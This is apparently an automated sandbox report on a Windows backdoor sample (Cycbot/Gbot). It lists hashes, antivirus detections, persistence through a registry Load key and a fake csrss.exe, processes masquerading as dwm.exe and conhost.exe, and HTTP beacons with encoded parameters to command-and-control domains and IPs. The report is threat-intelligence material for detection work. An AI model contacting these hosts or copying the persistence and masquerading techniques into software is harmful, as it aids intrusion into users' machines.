Analysis Date: 2014-11-08 11:58:20
MD5: 30e67f8b13815aedc475f793b0372ea5
SHA1: e4227eec59494a887417b282655234c00174b184

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 2748b17f3b34ddcdca3c070291636181 sha1: 64729c8bb2c1885a48108641735c4216882a8e16 size: 112640
Section: .rdata md5: bde782900c351104a37ccfdc491a22ef sha1: 7a6cd04054351e1e2fd55eacf2ea5c7bd36da6a2 size: 1536
Section: .data md5: 5e40f0d888cfa77da0fe70ca21ced124 sha1: 19ebd3305560fc1fcde0064b1313a3c03ae51e8f size: 74752
Section: .reloc md5: 087782ae910a1949fe304894fbcd510b sha1: 5cd5c03f1358cd6c38a266a07783a50abb6d40a0 size: 1024
Timestamp: 2005-10-02 17:35:57
PEhash: fd013d3439ef60ea47d9970f6e3d40784d1498f7
IMPhash: c30c9dc7fac6e4dd11e400159fb9c51d
AV 360 Safe: Gen:Variant.Kazy.38285
AV Ad-Aware: Gen:Variant.Kazy.38285
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen8
AV BullGuard: Gen:Variant.Kazy.38285
AV CA (E-Trust Ino): Win32/Cycbot.G!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-471
AV Dr. Web: BackDoor.Gbot.71
AV Emsisoft: Gen:Variant.Kazy.38285
AV Eset (nod32): Win32/Kryptik.SZU
AV Fortinet: W32/Jorik_Gbot.EBE!tr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV F-Secure: Gen:Variant.Kazy.38285
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Gbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Backdoor.Win32.Gbot.oho
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.r
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Variant.Kazy.38285
AV Norman: Gen:Variant.Kazy.38285
AV Rising: no_virus
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen7
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {5D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNS: freshmediaportal.com
Winsock DNS: worldmotoblo.com
Winsock DNS: 127.0.0.1
Winsock DNS: healthylifenow.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNS: healthylifenow.com
Type: A
208.109.208.147
DNS: zonedg.com
Type: A
141.8.225.80
DNS: zonedg.com
Type: A
141.8.225.80
DNS: worldmotoblo.com
Type: A
DNS: freshmediaportal.com
Type: A
HTTP GET: http://healthylifenow.com/templates/7349/images/header_logo.jpg?v89=10&tq=gHZutDyMv5rJejXia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaSPT%2Bsqpi8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaS%2FT%2BsqhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 208.109.208.147:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80

Raw Pcap

Strings